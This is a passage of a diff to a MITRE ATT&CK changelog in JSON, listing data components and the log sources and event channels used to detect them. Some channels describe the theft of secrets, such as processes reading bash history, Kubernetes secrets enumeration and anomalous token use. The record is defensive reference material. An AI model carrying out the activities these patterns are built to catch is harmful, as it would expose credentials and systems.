+                            "channel": "non-shell process tree accessing bash history"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process metadata mismatch between /proc and runtime attributes"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process environment variables containing LD_PRELOAD"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "EventCode=400, 403"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Process Execution + Hash"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "process_start: EventHeader.ProcessId true parent vs reported PPID mismatch"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC, ES_EVENT_TYPE_NOTIFY_MMAP"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Unsigned/invalid signature modules or images loaded by msbuild.exe or its children"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-DeviceGuard/Operational",
+                            "channel": "WDAC policy audit/block affecting msbuild.exe spawned payloads"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-SmartAppControl/Operational",
+                            "channel": "Smart App Control decisions (audit/block) for msbuild.exe-launched executables"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Unsigned or untrusted modules loaded during JamPlus.exe runtime"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Crash or abnormal termination of security agent or system extension host"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-04-16 17:01:33.771000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-05-11 16:22:58.802000+00:00",
+                    "modified": "2026-05-12 15:12:00.773000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0109",
+                            "external_id": "DC0109"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Process/Event Alarm",
+                    "description": "This includes a list of any process alarms or alerts produced to indicate unusual or concerning activity within the operational process (e.g., increased temperature/pressure)",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "Operational Databases",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.773000+00:00\", \"old_value\": \"2026-04-22 15:07:16.930000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.271000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0001",
+                            "external_id": "DC0001"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Scheduled Job Creation",
+                    "description": "The establishment of a task or job that will execute at a predefined time or based on specific triggers.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Scheduled Job",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4698"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Execution of non-standard script or binary by cron"
+                        },
+                        {
+                            "name": "WinEventLog:TaskScheduler",
+                            "channel": "EventCode=106"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "crontab, systemd_timers"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd_jobs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Startup script and task execution logs"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "verb=create, resource=cronjobs, group=batch"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: crontab edits, launch of cron job"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events - cron, launchd"
+                        },
+                        {
+                            "name": "esxi:cron",
+                            "channel": "execution of scheduled job"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "task creation events"
+                        },
+                        {
+                            "name": "macos:cron",
+                            "channel": "cron/launchd"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4699"
+                        },
+                        {
+                            "name": "linux:cron",
+                            "channel": "Scheduled execution of unknown or unusual script/binary"
+                        },
+                        {
+                            "name": "MobiledEDR:telemetry",
+                            "channel": "Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-04-09 17:05:23.355000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0001\", \"old_value\": \"https://attack.mitre.org/data-components/DC0001\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.774000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0041",
+                            "external_id": "DC0041"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Service Metadata",
+                    "description": "Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Service",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=4"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "service stopped messages"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl disable or bootout calls"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Stop VM or disable service events via vim-cmd"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "auditd service stopped or disabled"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "scheduled/real-time"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.launchservices"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "registers services with legitimate-sounding names"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=7035"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Service restart with modified executable path"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Observed loading of new LaunchAgent or LaunchDaemon plist"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "seccomp or AppArmor profile changes"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "Service stopped or RecoveryDisabled set via REAgentC"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Service events"
+                        },
+                        {
+                            "name": "WinEventLog:WinRM",
+                            "channel": "EventCode=6"
+                        },
+                        {
+                            "name": "auditd:CONFIG_CHANGE",
+                            "channel": "delete: Modification of systemd unit files or config for security agents"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of system configuration profiles affecting security tools"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "kubectl delete or patch of security pods/admission controllers"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "write: Startup configuration changes disabling security checks"
+                        },
+                        {
+                            "name": "auditd:DAEMON",
+                            "channel": "auditd stopped, config changed, logging suspended"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.774000+00:00\", \"old_value\": \"2026-04-16 16:59:19.254000+00:00\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.774000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0065",
+                            "external_id": "DC0065"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Service Modification",
+                    "description": "Changes made to an existing service or daemon, such as modifying the service name, start type, execution parameters, or security configurations.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "service state change"
+                        },
+                        {
+                            "name": "Service",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-IIS-Configuration",
+                            "channel": "Module or ISAPI filter registration events"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=7040"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.774000+00:00\", \"old_value\": \"2026-04-20 18:21:23.994000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.271000+00:00",
+                    "modified": "2026-05-12 15:12:00.777000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0002",
+                            "external_id": "DC0002"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "User Account Authentication",
+                    "description": "An attempt (successful and failed login attempts) by a user, service, or application to gain access to a network, system, or cloud-based resource. This typically involves credentials such as passwords, tokens, multi-factor authentication (MFA), or biometric validation.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "auditd:AUTH",
+                            "channel": "pam_unix or pam_google_authenticator invoked repeatedly within short interval"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "pam_authenticate, sshd"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of ssh, scp, or sftp using previously unseen credentials or keys"
+                        },
+                        {
+                            "name": "auditd:USER_LOGIN",
+                            "channel": "USER_AUTH"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "AssumeRole or ConsoleLogin with repeated MFA failures followed by repeated MFA requests"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "sts:GetFederationToken"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "AssumeRoleWithWebIdentity"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "AWS IAM: ListUsers, ListRoles"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "eventName=ConsoleLogin | eventType=AwsConsoleSignIn"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "ConsoleLogin or AssumeRole"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "ConsoleLogin, AssumeRole, ListAccessKeys, CreateUser"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Success logs from high-risk accounts"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Multiple MFA challenge requests without successful primary login"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "TokenIssued, TokenRenewed: Unexpected or anomalous token issuance events"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "SignIn: Sign-ins flagged as atypical (new geographic region, unfamiliar device id) shortly after correlated endpoint/browser compromise times"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Operation=UserLogin"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Unusual Token Usage or Application Consent"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "OperationName=SetDomainAuthentication OR Set-FederatedDomain"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Sign-in with unfamiliar location/device + portal navigation"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Login from newly created account"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Interactive/Non-Interactive Sign-In"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Reset password or download key from portal"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "status = failure"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Sign-in logs"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "SigninSuccess"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Failure Reason + UserPrincipalName"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Sign-in activity"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Sign-in logs / audit events"
+                        },
+                        {
+                            "name": "esxi:auth",
+                            "channel": "interactive shell or SSH access preceding storage enumeration"
+                        },
+                        {
+                            "name": "esxi:auth",
+                            "channel": "/var/log/auth.log"
+                        },
+                        {
+                            "name": "esxi:auth",
+                            "channel": "SSH session/login"
+                        },
+                        {
+                            "name": "esxi:vpxa",
+                            "channel": "user login from unexpected IP or non-admin user role"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "/var/log/vmware/vpxd.log"
+                        },
+                        {
+                            "name": "ESXiLogs:authlog",
+                            "channel": "Unexpected login followed by encoding commands"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "drive.activity"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "login.event"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "Sign-in logs / audit events"
+                        },
+                        {
+                            "name": "gcp:workspaceaudit",
+                            "channel": "Token Generation via Domain Delegation"
+                        },
+                        {
+                            "name": "GCPAuditLogs:login.googleapis.com",
+                            "channel": "Failed sign-in events"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "get/list requests to /api/v1/secrets or /api/v1/namespaces/*/serviceaccounts"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "authentication.k8s.io/v1beta1"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "Failed login"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "authentication.k8s.io"
+                        },
+                        {
+                            "name": "linux:auth",
+                            "channel": "sshd login"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sudo/date/timedatectl execution by non-standard users"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "SSH failed login"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Failed password for invalid user"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sshd[pid]: Failed password"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "authentication and authorization events during environmental validation phase"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Logon failure"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "FailedLogin"
+                        },
+                        {
+                            "name": "m365:signinlogs",
+                            "channel": "Sign-in from anomalous location or impossible travel condition"
+                        },
+                        {
+                            "name": "m365:signinlogs",
+                            "channel": "UserLoginSuccess"
+                        },
+                        {
+                            "name": "m365:signinlogs",
+                            "channel": "Unusual sign-in from service principal to user mailbox"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Delegated permission grants without user login event"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "login using refresh_token with no preceding authentication context"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Sign-in logs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "successful sudo or authentication for account not normally associated with admin actions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Login success without MFA step"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log show --predicate 'eventMessage contains \"Authentication\"'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "User credential prompt events without associated trusted installer package"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Login failure / authorization denied"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "auth"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Login Window and Authd errors"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "authd"
+                        },
+                        {
+                            "name": "network:auth",
+                            "channel": "repeated successful authentications with previously unknown accounts or anomalous password acceptance"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "config access, authentication logs"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "User privilege escalation to level 15/root prior to destructive commands"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "authorization/accounting logs"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Failed and successful logins to network devices outside approved admin IP ranges"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Privileged login followed by destructive format command"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "admin login events"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Privileged login followed by destructive command sequence"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "AAA, RADIUS, or TACACS authentication"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "authentication logs"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "AAA or TACACS authentication failures"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "authentication & authorization"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "login failed"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Accepted password or publickey for user from remote IP"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Repeated failed authentication attempts or replay patterns"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Successful login without expected MFA challenge"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "sshd or PAM logins"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TGS-REQ and AS-REQ seen for new user shortly after domain-modifying process"
+                        },
+                        {
+                            "name": "Okta:authn",
+                            "channel": "authentication_failure"
+                        },
+                        {
+                            "name": "Okta:SystemLog",
+                            "channel": "eventType: user.authentication.sso, app.oauth2.token.grant"
+                        },
+                        {
+                            "name": "saas-app:auth",
+                            "channel": "login_failure"
+                        },
+                        {
+                            "name": "saas:audit",
+                            "channel": "Repeated requests to SMS-generating endpoints using anomalous or new user agents, IP ranges, or geographies."
+                        },
+                        {
+                            "name": "saas:auth",
+                            "channel": "signin_failed"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "API access without user login"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "Accessed third-party credential management service"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "login with reused session token and mismatched user agent or IP"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "Access via OAuth credentials with unusual scopes or from anomalous IPs"
+                        },
+                        {
+                            "name": "saas:MDM",
+                            "channel": "Authentication events to device management or enterprise mobility management consoles"
+                        },
+                        {
+                            "name": "saas:MDM",
+                            "channel": "Authentication events to Apple iCloud or enterprise device management services"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "session.impersonation.start"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "Unusual OAuth app requesting message-read scopes for Slack/Teams/Jira"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "authentication_failure"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "Sign-in logs / audit events"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "user.account.reset_password; user.mfa.factor.activate; app.oauth2.authorize"
+                        },
+                        {
+                            "name": "saas:salesforce",
+                            "channel": "API login using access_token without login history"
+                        },
+                        {
+                            "name": "saas:salesforce",
+                            "channel": "Login"
+                        },
+                        {
+                            "name": "User Account",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4625"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4769, 1200, 1202"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4768, 4769, 4770"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4769"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4776, 4625"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4625, 4771, 4648"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4648"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.777000+00:00\", \"old_value\": \"2026-04-24 19:47:33.610000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0063",
+                            "external_id": "DC0063"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Windows Registry Key Modification",
+                    "description": "Changes made to an existing registry key or its values. These modifications can include altering permissions, modifying stored data, or updating configuration settings.\n\n*Data Collection Measures:*\n\n- Windows Event Logs\n    - Event ID 4657 - Registry Value Modified: Logs changes to registry values, including modifications to startup entries, security settings, or system configurations.\n- Sysmon (System Monitor) for Windows\n    - Sysmon Event ID 13 - Registry Value Set: Captures changes to specific registry values.\n    - Sysmon Event ID 14 - Registry Key & Value Renamed: Logs renaming of registry keys, which may indicate evasion attempts.\n- Endpoint Detection and Response (EDR) Solutions\n    - Monitor registry modifications for suspicious behavior.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4657"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "StubPath value written under HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "MacroSecuritySettingsChanged or SafeModeDisabled"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=13, 14"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "modification to Winlogon registry keys such as Shell, Notify, or Userinit"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "Registry key modification HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient\\EnableMulticast"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "g_CiOptions modification or SIP state change"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "Autoruns reports DLLs in AppInit_DLLs key"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-03-13 23:12:09.029000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0063\", \"old_value\": \"https://attack.mitre.org/data-components/DC0063\"}}}",
+                    "previous_version": "2.0"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "detectionstrategies": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6d2ba563-0aa9-4f64-a14d-da62b694b495",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0802",
+                            "external_id": "DET0802"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Activate Firmware Update Mode",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--96e7b86f-b960-489c-882b-9dcdb1c44aa9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b6a6d95c-e3b5-438d-a095-3fb0859c8f45",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
